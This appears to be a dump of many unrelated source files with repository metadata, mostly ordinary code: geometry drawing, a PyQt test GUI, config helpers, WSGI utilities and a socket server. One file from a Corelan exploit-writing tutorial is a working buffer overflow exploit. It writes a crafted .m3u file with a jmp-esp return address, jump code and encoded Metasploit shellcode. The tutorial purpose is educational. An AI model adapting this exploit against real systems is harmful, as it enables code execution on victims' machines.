] | 770 | 2017-09-22T13:42:06.000Z | 2022-03-31T21:26:45.000Z | src/compas_rhino/artists/pointartist.py | funkchaser/compas | b58de8771484aa0c6068d43df78b1679503215de | [
"MIT"
] | 99 | 2017-11-06T23:15:28.000Z | 2022-03-25T16:05:36.000Z | from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
import compas_rhino
from compas.artists import PrimitiveArtist
from .artist import RhinoArtist
class PointArtist(RhinoArtist, PrimitiveArtist):
"""Artist for drawing points.
Parameters
----------
point : :class:`compas.geometry.Point`
A COMPAS point.
layer : str, optional
The layer that should contain the drawing.
"""
def __init__(self, point, layer=None, **kwargs):
super(PointArtist, self).__init__(primitive=point, layer=layer, **kwargs)
def draw(self):
"""Draw the point.
Returns
-------
list
The GUIDs of the created Rhino objects.
"""
points = [{'pos': list(self.primitive), 'color': self.color, 'name': self.primitive.name}]
guids = compas_rhino.draw_points(points, layer=self.layer, clear=False, redraw=False)
return guids
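draw() packs the point into a list of attribute dictionaries before handing it to compas_rhino.draw_points. A sketch of that payload built with plain Python stand-ins (no Rhino required; the coordinates, color, and name below are made-up example values):

```python
# Stand-ins for list(self.primitive), self.color, and self.primitive.name
pos = [1.0, 2.0, 3.0]
points = [{'pos': pos, 'color': (255, 0, 0), 'name': 'P1'}]
print(points[0]['name'])  # P1
```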
| 27.277778 | 98 | 0.657841 | 111 | 982 | 5.594595 | 0.45045 | 0.048309 | 0.077295 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.234216 | 982 | 35 | 99 | 28.057143 | 0.825798 | 0.263747 | 0 | 0 | 0 | 0 | 0.018721 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.153846 | false | 0 | 0.461538 | 0 | 0.769231 | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
48402832da134998cb30b07c0cce5f9e6b5f65bd | 5,628 | py | Python | GUI/class_Bolita.py | AnuTor/UniNeuroLab | 5825f440d4663650f038083f3da05229cc5ada4f | [
"Apache-2.0"
] | null | null | null | GUI/class_Bolita.py | AnuTor/UniNeuroLab | 5825f440d4663650f038083f3da05229cc5ada4f | [
"Apache-2.0"
] | null | null | null | GUI/class_Bolita.py | AnuTor/UniNeuroLab | 5825f440d4663650f038083f3da05229cc5ada4f | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# coding: utf-8
# In[1]:
from PyQt5 import QtWidgets
from PyQt5.QtWidgets import QApplication, QMainWindow
#from PyQt5.QtCore import Qt
import numpy as np
#import sys
#import time
global n
rango=np.arange(1,26)
n= np.random.permutation(rango)
## Create a second class
st = str("border-radius : 15; border : 1px solid black")
#global st
class Bolitas():
    """ Here we will create each of the balls of the test
    with their attributes and their methods to work with them as objects"""
    def __init__(self, setGeometry , t_Obj = QtWidgets.QPushButton, id = 0, valor = 0, estado = 0, setStyleSheet = st):
        #super(Bolitas, self).__init__()
        """ Create a new ball with its initial attributes """
        self.g1 = setGeometry[0] #X coordinate
        self.g2 = setGeometry[1] #Y coordinate
        self.g3 = setGeometry[2] #Width
        self.g4 = setGeometry[3] #Height
        self.t_Obj= QtWidgets.QPushButton
        self.id = id
        self.valor = valor # can take values from 1 to 25
        self.estado = estado # can have 3 states: white, green or red
        self.setStyleSheet = st
'''
def cambioColor(self):
""" Este metodo hace que la bolita cambie de estado"""
global estado #estado1
global n
global tr1
global tr2
global tr3
global tr4
global tr5
print("El estado de la bolita", "es: ")
print(estado)
estado = estado +1
#numero_estado1=numero_estado1+1
if numero_estado1==n[0]:
print("Color Verde")
self.b1.setStyleSheet("background-color: green; color: white; border-radius : 15; border : 1px solid green")
            # Here we must evaluate all the relative conditions of all the balls
if tr2==1:
self.b2.setStyleSheet("border-radius : 15; border : 1px solid black")
tr2=0
if tr3==1:
self.b3.setStyleSheet("border-radius : 15; border : 1px solid black")
tr3=0
if tr4==1:
self.b4.setStyleSheet("border-radius : 15; border : 1px solid black")
tr4=0
if tr5==1:
self.b5.setStyleSheet("border-radius : 15; border : 1px solid black")
tr5=0
elif numero_estado1 != n[0] :
print("Color Rojo")
self.b1.setStyleSheet("background-color: red; color: white; border-radius : 15; border : 1px solid red")
print("El número es mayor al esperado, elija el número siguiente al marcado en verde")
numero_estado1=numero_estado1-1
            tr1=1 # Raise the flag that a ball greater than the expected one was pressed
else:
print("Color Negro")
self.b1.setStyleSheet("border-radius : 15; border : 1px solid black")
def contarIntentos(self):
        this method counts how many clicks are made on the ball button
return num_intentos
'''
print("Me parece que cree la primer bolita")
#print("Este es n: ", n)
i= 0
numero_estado1 = 0
numero_estado2 = 0
numero_estado3 = 0
numero_estado4 = 0
numero_estado5 = 0
numero_estado6 = 0
numero_estado7 = 0
numero_estado8 = 0
numero_estado9 = 0
numero_estado10 = 0
numero_estado11 = 0
numero_estado12 = 0
numero_estado13 = 0
numero_estado14 = 0
numero_estado15 = 0
numero_estado16 = 0
numero_estado17 = 0
numero_estado18 = 0
numero_estado19 = 0
numero_estado20 = 0
numero_estado21 = 0
numero_estado22 = 0
numero_estado23 = 0
numero_estado24 = 0
numero_estado25 = 0
# We now create each ball (25 balls) as an object of the Bolitas class
b1 = Bolitas([400,400,30,30], QtWidgets.QPushButton, "1" , n[0], 0, st)
b2 = Bolitas([460,480,30,30], QtWidgets.QPushButton, "2" , n[1], 0, st)
b3 = Bolitas([250,450,30,30], QtWidgets.QPushButton, "3" , n[2], 0, st)
b4 = Bolitas([450,370,30,30] , QtWidgets.QPushButton, "4" , n[3], 0, st)
b5 = Bolitas([250,50,30,30], QtWidgets.QPushButton, "5" , n[4], 0, st)
b6 = Bolitas([20,470,30,30], QtWidgets.QPushButton, "6" , n[5], 0, st)
b7 = Bolitas([380,200,30,30], QtWidgets.QPushButton, "7" , n[6], 0, st)
b8 = Bolitas([200,200,30,30] , QtWidgets.QPushButton, "8" , n[7], 0, st)
b9 = Bolitas([250,350,30,30] , QtWidgets.QPushButton, "9" , n[8], 0, st)
b10 = Bolitas([180,280,30,30] , QtWidgets.QPushButton, "10", n[9], 0, st)
b11 = Bolitas([130,420,30,30], QtWidgets.QPushButton, "11", n[10],0, st)
b12 = Bolitas([420,130,30,30] , QtWidgets.QPushButton, "12", n[11],0, st)
b13 = Bolitas([200,90,30,30] , QtWidgets.QPushButton, "13", n[12],0, st)
b14 = Bolitas([330,290,30,30] , QtWidgets.QPushButton, "14", n[13],0, st)
b15 = Bolitas([150,370,30,30] , QtWidgets.QPushButton, "15", n[14],0, st)
b16 = Bolitas([380,80,30,30], QtWidgets.QPushButton, "16", n[15],0, st)
b17 = Bolitas([325,200,30,30], QtWidgets.QPushButton, "17", n[16],0, st)
b18 = Bolitas([270,300,30,30] , QtWidgets.QPushButton, "18", n[17],0, st)
b19 = Bolitas([20,180,30,30] , QtWidgets.QPushButton, "19", n[18],0, st)
b20 = Bolitas([35,320,30,30] , QtWidgets.QPushButton, "20", n[19],0, st)
b21 = Bolitas([90,360,30,30] , QtWidgets.QPushButton, "21", n[20],0, st)
b22 = Bolitas([95,140,30,30] , QtWidgets.QPushButton, "22", n[21],0, st)
b23 = Bolitas([70,220,30,30] , QtWidgets.QPushButton, "23", n[22],0, st)
b24 = Bolitas([180,150,30,30], QtWidgets.QPushButton, "24", n[23],0, st)
b25 = Bolitas([135,80,30,30] , QtWidgets.QPushButton, "25", n[24],0, st)
| 34.109091 | 120 | 0.617093 | 816 | 5,628 | 4.204657 | 0.322304 | 0.157389 | 0.094725 | 0.174876 | 0.203439 | 0.113378 | 0.098805 | 0.089187 | 0 | 0 | 0 | 0.128568 | 0.246802 | 5,628 | 164 | 121 | 34.317073 | 0.680821 | 0.089375 | 0 | 0 | 0 | 0 | 0.037748 | 0 | 0 | 0 | 0 | 0.018293 | 0 | 1 | 0.014286 | false | 0 | 0.042857 | 0 | 0.071429 | 0.014286 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
48458268785e68b363c117611b61e713674bbf90 | 307 | py | Python | tests/config/conftest.py | ConsenSys/python-utils | 9725f15f688303e116b7937242f8354a4a070808 | [
"MIT"
] | 4 | 2019-04-14T02:08:19.000Z | 2021-04-14T19:10:04.000Z | tests/config/conftest.py | ConsenSys/python-utils | 9725f15f688303e116b7937242f8354a4a070808 | [
"MIT"
] | 4 | 2018-07-29T19:10:49.000Z | 2018-08-08T16:33:01.000Z | tests/config/conftest.py | ConsenSys/python-utils | 9725f15f688303e116b7937242f8354a4a070808 | [
"MIT"
] | 2 | 2019-10-24T21:28:46.000Z | 2021-02-16T10:51:57.000Z | """
tests.config.conftest
~~~~~~~~~~~~~~~~~~~~~
:copyright: Copyright 2017 by ConsenSys France.
:license: BSD, see LICENSE for more details.
"""
import os
import pytest
@pytest.fixture(scope='session')
def config_files_dir(test_dir):
yield os.path.join(test_dir, 'config', 'files')
| 18.058824 | 51 | 0.644951 | 38 | 307 | 5.105263 | 0.710526 | 0.113402 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015748 | 0.172638 | 307 | 16 | 52 | 19.1875 | 0.748032 | 0.446254 | 0 | 0 | 0 | 0 | 0.123288 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.4 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
4849326d5f2864496a94bf5145f71dee5cdb0069 | 379 | py | Python | sphinxcontrib/needs/services/base.py | David-Le-Nir/sphinxcontrib-needs | fe809445505fa1e9bf5963eab1d6283dad405e92 | [
"MIT"
] | 1 | 2022-03-24T08:55:28.000Z | 2022-03-24T08:55:28.000Z | sphinxcontrib/needs/services/base.py | David-Le-Nir/sphinxcontrib-needs | fe809445505fa1e9bf5963eab1d6283dad405e92 | [
"MIT"
] | null | null | null | sphinxcontrib/needs/services/base.py | David-Le-Nir/sphinxcontrib-needs | fe809445505fa1e9bf5963eab1d6283dad405e92 | [
"MIT"
] | null | null | null | from sphinxcontrib.needs.logging import get_logger
class BaseService:
def __init__(self, *args, **kwargs):
self.log = get_logger(__name__)
def request(self, *args, **kwargs):
raise NotImplementedError("Must be implemented by the service!")
def debug(self, *args, **kwargs):
raise NotImplementedError("Must be implemented by the service!")
| 29.153846 | 72 | 0.693931 | 45 | 379 | 5.622222 | 0.577778 | 0.094862 | 0.166008 | 0.150198 | 0.529644 | 0.529644 | 0.529644 | 0.529644 | 0.529644 | 0.529644 | 0 | 0 | 0.197889 | 379 | 12 | 73 | 31.583333 | 0.832237 | 0 | 0 | 0.25 | 0 | 0 | 0.184697 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.375 | false | 0 | 0.125 | 0 | 0.625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
48558594c3096bfbc0e20192b5caa99e79018e52 | 1,639 | py | Python | solum/common/config.py | devdattakulkarni/test-solum | 4e9ddb82d217116aa2c30a6f2581080cbdfae325 | [
"Apache-2.0"
] | null | null | null | solum/common/config.py | devdattakulkarni/test-solum | 4e9ddb82d217116aa2c30a6f2581080cbdfae325 | [
"Apache-2.0"
] | null | null | null | solum/common/config.py | devdattakulkarni/test-solum | 4e9ddb82d217116aa2c30a6f2581080cbdfae325 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2016 Hewlett Packard Enterprise Development Corporation, LP
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from oslo_config import cfg
from oslo_middleware import cors
def set_config_defaults():
"""This method updates all configuration default values."""
set_cors_middleware_defaults()
def set_cors_middleware_defaults():
"""Update default configuration options for oslo.middleware."""
# CORS Defaults
# TODO(krotscheck): Update with https://review.openstack.org/#/c/285368/
cfg.set_defaults(cors.CORS_OPTS,
allow_headers=['X-Auth-Token',
'X-Openstack-Request-Id',
'X-Subject-Token'],
expose_headers=['X-Auth-Token',
'X-Openstack-Request-Id',
'X-Subject-Token'],
allow_methods=['GET',
'PUT',
'POST',
'DELETE',
'PATCH']
) | 39.97561 | 76 | 0.577791 | 181 | 1,639 | 5.149171 | 0.596685 | 0.064378 | 0.027897 | 0.034335 | 0.10515 | 0.10515 | 0.10515 | 0.10515 | 0.10515 | 0.10515 | 0 | 0.012891 | 0.337401 | 1,639 | 41 | 77 | 39.97561 | 0.845304 | 0.482611 | 0 | 0.222222 | 0 | 0 | 0.144769 | 0.053528 | 0 | 0 | 0 | 0.02439 | 0 | 1 | 0.111111 | true | 0 | 0.111111 | 0 | 0.222222 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
48586969737d81ee3de0e8c13dfe77791efd4eca | 534 | py | Python | Task2_svr.py | malincj/hw01_cw_ans | 867a21a6574a5c380780c581b4fcc7efaf150c57 | [
"MIT"
] | null | null | null | Task2_svr.py | malincj/hw01_cw_ans | 867a21a6574a5c380780c581b4fcc7efaf150c57 | [
"MIT"
] | null | null | null | Task2_svr.py | malincj/hw01_cw_ans | 867a21a6574a5c380780c581b4fcc7efaf150c57 | [
"MIT"
] | null | null | null | #Task2
import socket
# Keep a distinct name so the socket module is not shadowed
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Listen port
server.bind(("localhost", 8181))
# Clients connect
server.listen(2)
cnt = 1
chk = 0
while cnt <= 2:
    (c, address) = server.accept()
    print("Connected %s:%s" % (address[0], address[1]))
    if cnt == 1:
        # The first client sends the starting number
        clientdata = c.recv(1024)
        chk = int(clientdata.decode())
        c.close()
    else:
        # The second client receives the number decremented by one
        chk -= 1
        c.send(str(chk).encode())
        c.close()
        break
    cnt += 1
server.close()
487164f9f3c31a3c2c1e44b69882d2efa80114b3 | 2,166 | py | Python | corelan-exploit-writing-tutorial/stack-based-overflows/exploit-smallbuffers.py | pravinsrc/Exploite-windows | 1245ec8b0353f8bcc52ca6038e75a345f2d656ff | [
"MIT"
] | 71 | 2018-09-25T13:33:57.000Z | 2022-03-22T19:14:06.000Z | corelan-exploit-writing-tutorial/stack-based-overflows/exploit-smallbuffers.py | pravinsrc/windows-exploitation | 1245ec8b0353f8bcc52ca6038e75a345f2d656ff | [
"MIT"
] | null | null | null | corelan-exploit-writing-tutorial/stack-based-overflows/exploit-smallbuffers.py | pravinsrc/windows-exploitation | 1245ec8b0353f8bcc52ca6038e75a345f2d656ff | [
"MIT"
] | 24 | 2018-12-03T20:02:36.000Z | 2021-12-14T10:55:40.000Z | import struct
OUTPUT_FILE = "exploit.m3u"
def get_shellcode():
# windows/exec - 216 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, PrependMigrate=false, EXITFUNC=seh, CMD=calc
buf = ""
buf += "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1"
buf += "\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30"
buf += "\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa"
buf += "\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96"
buf += "\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b"
buf += "\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a"
buf += "\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83"
buf += "\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98"
buf += "\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61"
buf += "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05"
buf += "\x7f\xe8\x7b\xca"
return buf
def get_jumpcode():
jumpcode = ""
jumpcode += "\x83\xc4\x7e" # add esp,0x5e
jumpcode += "\x83\xc4\x7e" # add esp,0x5e
jumpcode += "\x83\xc4\x7e" # add esp,0x5e
jumpcode += "\x83\xc4\x7e" # add esp,0x5e
jumpcode += "\xff\xe4" # jmp esp
return jumpcode
def generate_exploit():
buffer_size = 26064
# offset = 465, esp needs to be 0xf38 - 0xd38 = 0x200 = 512d
junk = "A" * 460
eip = struct.pack('<I', 0x7e498c6b) # jmp esp
nope_slide = "\x90" * 50
shellcode = get_shellcode()
restofbuffer_len = buffer_size - (len(junk) + len(nope_slide) + len(shellcode))
restofbuffer = "\x90" * restofbuffer_len
preshellcode = "X" * 4
buffer = junk + nope_slide + shellcode + restofbuffer
buffer += eip + preshellcode + get_jumpcode()
return buffer
def write_file(buffer):
try:
with open(OUTPUT_FILE, "w") as f:
f.write(buffer)
except IOError:
print "Failed to write file !"
def main():
exploit = generate_exploit()
write_file(exploit)
print "Exploit generated !"
if __name__ == "__main__":
main()
| 32.328358 | 81 | 0.611727 | 328 | 2,166 | 3.957317 | 0.579268 | 0.033898 | 0.043143 | 0.052388 | 0.089368 | 0.089368 | 0.089368 | 0.089368 | 0.089368 | 0.089368 | 0 | 0.150385 | 0.220222 | 2,166 | 66 | 82 | 32.818182 | 0.618117 | 0.122345 | 0 | 0.083333 | 0 | 0.208333 | 0.386725 | 0.307186 | 0 | 0 | 0.005485 | 0 | 0 | 0 | null | null | 0 | 0.020833 | null | null | 0.041667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
4876f3f9c3badf6fae289a4ddee97faae53ffe65 | 821 | py | Python | src/aceinna/devices/upgrade_workers/__init__.py | lihaiyong827/python-openimu | f1c536ba4182aaeabd87b63c08ebd92f97e8dbb4 | [
"Apache-2.0"
] | 41 | 2018-07-20T17:30:33.000Z | 2022-02-24T08:17:39.000Z | src/aceinna/devices/upgrade_workers/__init__.py | lihaiyong827/python-openimu | f1c536ba4182aaeabd87b63c08ebd92f97e8dbb4 | [
"Apache-2.0"
] | 52 | 2018-06-25T22:15:14.000Z | 2022-03-10T07:30:56.000Z | src/aceinna/devices/upgrade_workers/__init__.py | lihaiyong827/python-openimu | f1c536ba4182aaeabd87b63c08ebd92f97e8dbb4 | [
"Apache-2.0"
] | 31 | 2018-12-19T00:10:08.000Z | 2022-03-19T02:14:03.000Z | class UPGRADE_EVENT:
'''
Event type of Device Message Center
'''
FIRST_PACKET = 'first_packet'
BEFORE_WRITE = 'before_write'
AFTER_WRITE = 'after_write'
BEFORE_COMMAND='before_command'
AFTER_COMMAND='after_command'
FINISH = 'finish'
ERROR = 'error'
PROGRESS = 'progress'
class UPGRADE_GROUP:
FIRMWARE = 'firmware'
BEFORE_ALL = 'before_all'
AFTER_ALL = 'after_all'
from .firmware_worker import FirmwareUpgradeWorker
from .ethernet_sdk_9100_worker import SDKUpgradeWorker as EthernetSDK9100UpgradeWorker
from .sdk_8100_worker import SDKUpgradeWorker as SDK8100UpgradeWorker
from .sdk_9100_worker import SDKUpgradeWorker as SDK9100UpgradeWorker
from .jump_application_worker import JumpApplicationWorker
from .jump_bootloader_worker import JumpBootloaderWorker
| 27.366667 | 86 | 0.779537 | 90 | 821 | 6.8 | 0.422222 | 0.117647 | 0.137255 | 0.147059 | 0.120915 | 0.120915 | 0 | 0 | 0 | 0 | 0 | 0.034935 | 0.163216 | 821 | 29 | 87 | 28.310345 | 0.855895 | 0.042631 | 0 | 0 | 0 | 0 | 0.140442 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.315789 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
4882079c321173d6479baa95ec2dc470a5ff9a54 | 2,381 | py | Python | authcode/wsgi/bottle.py | lucuma/authcode | 91529b6d0caec07d1452758d937e1e0745826139 | [
"MIT"
] | 11 | 2015-01-14T17:12:46.000Z | 2015-11-04T12:41:19.000Z | authcode/wsgi/bottle.py | lucuma/authcode | 91529b6d0caec07d1452758d937e1e0745826139 | [
"MIT"
] | null | null | null | authcode/wsgi/bottle.py | lucuma/authcode | 91529b6d0caec07d1452758d937e1e0745826139 | [
"MIT"
] | 1 | 2016-01-12T14:55:15.000Z | 2016-01-12T14:55:15.000Z | # coding=utf-8
from __future__ import absolute_import
from .._compat import to_native
HTTP_FORBIDDEN = 403
def get_site_name(request):
"""Return the domain:port part of the URL without scheme.
Eg: facebook.com, 127.0.0.1:8080, etc.
"""
urlparts = request.urlparts
return ':'.join([urlparts.hostname, str(urlparts.port)])
def get_full_path(request):
"""Return the current relative path including the query string.
Eg: “/foo/bar/?page=1”
"""
path = request.fullpath
query_string = request.environ.get('QUERY_STRING')
if query_string:
path += '?' + to_native(query_string)
return path
def make_full_url(request, url):
"""Get a relative URL and returns the absolute version.
Eg: “/foo/bar?q=is-open” ==> “http://example.com/foo/bar?q=is-open”
"""
urlparts = request.urlparts
return '{scheme}://{site}/{url}'.format(
scheme=urlparts.scheme,
site=get_site_name(request),
url=url.lstrip('/'),
)
def is_post(request):
"""Return ``True`` if the method of the request is ``POST``.
"""
return request.method.upper() == 'POST'
def is_idempotent(request):
"""Return ``True`` if the method of the request is ``GET`` or ``HEAD``.
"""
return request.method.upper() in ('GET', 'HEAD')
def redirect(url):
"""Return an HTTP 303 See Other response for this url, in the
idiom of the framework.
"""
from bottle import redirect
redirect(url)
def raise_forbidden(msg='You are not allowed to access this.'):
"""Return an HTTP 403 Forbidden response (with the passed message), in the
idiom of the framework.
"""
from bottle import abort
abort(HTTP_FORBIDDEN, msg)
def get_from_params(request, key):
"""Try to read a value named ``key`` from the GET parameters.
"""
return request.query.get(key)
def get_from_headers(request, key):
"""Try to read a value named ``key`` from the headers.
"""
return request.headers.get(key)
def get_post_data(request):
"""Return all the POST data from the request.
"""
return request.forms
def make_response(body, mimetype='text/html'):
"""Build a framework specific HTPP response, containing ``body`` and
marked as the type ``mimetype``.
"""
from bottle import response
response.content_type = mimetype
return body or u''
| 25.329787 | 78 | 0.655187 | 331 | 2,381 | 4.613293 | 0.353474 | 0.051081 | 0.031434 | 0.023576 | 0.176817 | 0.15979 | 0.15979 | 0.15979 | 0.15979 | 0.1074 | 0 | 0.011224 | 0.214196 | 2,381 | 93 | 79 | 25.602151 | 0.804917 | 0.376312 | 0 | 0.051282 | 0 | 0 | 0.067636 | 0.016727 | 0 | 0 | 0 | 0 | 0 | 1 | 0.282051 | false | 0 | 0.128205 | 0 | 0.641026 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
48828efd84d51b57359d8aca027021a0363c7b67 | 1,556 | py | Python | .history/classes/Player_20171106221435.py | reecebenson/DADSA-Tennis-PartA | d0763f819b300fcd0ce27041f5bc4ef0519c00bf | [
"MIT"
] | null | null | null | .history/classes/Player_20171106221435.py | reecebenson/DADSA-Tennis-PartA | d0763f819b300fcd0ce27041f5bc4ef0519c00bf | [
"MIT"
] | null | null | null | .history/classes/Player_20171106221435.py | reecebenson/DADSA-Tennis-PartA | d0763f819b300fcd0ce27041f5bc4ef0519c00bf | [
"MIT"
] | null | null | null | # DADSA - Assignment 1
# Reece Benson
class Player():
_id = None
_name = None
_gender = None
_score = None
_points = None
def __init__(self, _name, _gender, _id):
self._id = _id
self._name = _name
self._gender = _gender
self._score = { }
self._points = 0
def __cmp__(self, other):
"""Compare Override"""
if(self._points < other._points):
return -1
elif(self._points > other._points):
return 1
else:
return 0
# Comparison Overrides
def __eq__(self, other):
return not self._points < other._points and not other._points < self._points
def __ne__(self, other):
return self._points < other._points or other._points < self._points
def __gt__(self, other):
return other._points < self._points
def __ge__(self, other):
return not self._points < other._points
def __le__(self, other):
return not other._points < self._points
def get_name(self):
return self._name
def get_gender(self):
return self._gender
def get_score(self, _match):
return self._score[_match]
def set_score(self, _match, _score):
        self._score[_match] = _score
return self._score[_match]
def get_points(self):
return self._points
def set_points(self, _points, append = False):
if(append):
self._points += _points
else:
self._points = _points
        return self._points
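The comparison overrides above make players sortable by points. A trimmed-down replica (standalone, since the full class is not importable here) shows the same ordering behaviour, using `functools.total_ordering` to derive the remaining operators:

```python
import functools

# Minimal replica of the Player ordering logic: equality and ordering
# are both driven by the points total.
@functools.total_ordering
class PlayerSketch:
    def __init__(self, name, points):
        self.name = name
        self.points = points

    def __eq__(self, other):
        return self.points == other.points

    def __lt__(self, other):
        return self.points < other.points

players = [PlayerSketch("Alice", 12), PlayerSketch("Bob", 7), PlayerSketch("Cara", 20)]
ranking = sorted(players, reverse=True)  # highest points first
print([p.name for p in ranking])  # -> ['Cara', 'Alice', 'Bob']
```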

# File: influxdb_metrics/tests/urls.py (dubizzle/django_influxdb_metrics, MIT)

"""URLs to run the tests."""
try:
from django.conf.urls import include, url
except ImportError: # Pre-Django 1.4 version
from django.conf.urls.defaults import include, url
from django.contrib import admin
admin.autodiscover()
urlpatterns = [
url(r'^admin/', include(admin.site.urls)),
]

# File: rest/taskrouter/twiml/example2/example/example.6.x.py (azaddeveloper/api-snippets, MIT)

# Download the Python helper library from twilio.com/docs/python/install
from flask import Flask
from twilio.twiml.voice_response import VoiceResponse
app = Flask(__name__)
@app.route("/enqueue_call", methods=['GET', 'POST'])
def enqueue_call():
# workflow_sid = 'WW0123456789abcdef0123456789abcdef'
resp = VoiceResponse()
# TODO waiting for https://github.com/twilio/twilio-python/issues/283
# with resp.enqueue(None, workflowSid=workflow_sid) as e:
# e.task('{"account_number":"12345abcdef"}')
return str(resp)

# File: web-interface/app/application/src/misc/sampling.py (horvathi94/seqmeta, MIT)

from application.src.db.interface import DBInterface
class SamplingStrategies(DBInterface):
    display_table_name = "view_sampling_strategies"
    edit_table_name = "view_sampling_strategies"
    submit_table_name = "sampling_strategies"
    save_procedure = "upsert_basic_table"


class SpecimenSources(DBInterface):
    display_table_name = "view_specimen_sources"
    edit_table_name = "view_specimen_sources"
    submit_table_name = "specimen_sources"
    save_procedure = "upsert_basic_table"


class SampleCaptureStatuses(DBInterface):
    display_table_name = "sample_capture_status"


class HostAnatomicalMaterials(DBInterface):
    display_table_name = "view_host_anatomical_materials"
    edit_table_name = "view_host_anatomical_materials"
    submit_table_name = "host_anatomical_materials"
    save_procedure = "upsert_basic_table"


class HostBodyProducts(DBInterface):
    display_table_name = "view_host_body_products"
    edit_table_name = "view_host_body_products"
    submit_table_name = "host_body_products"
    save_procedure = "upsert_basic_table"


class PurposesOfSampling(DBInterface):
    display_table_name = "purposes_of_sampling"
    edit_table_name = "view_purposes_of_sampling"
    submit_table_name = "purposes_of_sampling"
    save_procedure = "upsert_basic_table"


class PurposesOfSequencing(DBInterface):
    display_table_name = "purposes_of_sequencing"
    edit_table_name = "view_purposes_of_sequencing"
    submit_table_name = "purposes_of_sequencing"
    save_procedure = "upsert_basic_table"


class CollectionDevices(DBInterface):
    display_table_name = "view_collection_devices"
    edit_table_name = "view_collection_devices"
    submit_table_name = "collection_devices"
    save_procedure = "upsert_basic_table"

# File: production/pygsl-0.9.5/gsl_dist/__init__.py (juhnowski/FishingRod, MIT)

# Just for declaration
__all__ = ["gsl_Extension"]

# File: bhabana/models/batch_bottle.py (dashayushman/bhabana, Apache-2.0)

import torch.nn as nn
class BatchBottle(nn.Module):
''' Perform the reshape routine before and after an operation '''
def forward(self, input):
if len(input.size()) <= 2:
return super(BatchBottle, self).forward(input)
size = input.size()[1:]
out = super(BatchBottle, self).forward(input.view(-1, size[0]*size[1]))
        return out.view(-1, size[0], size[1])
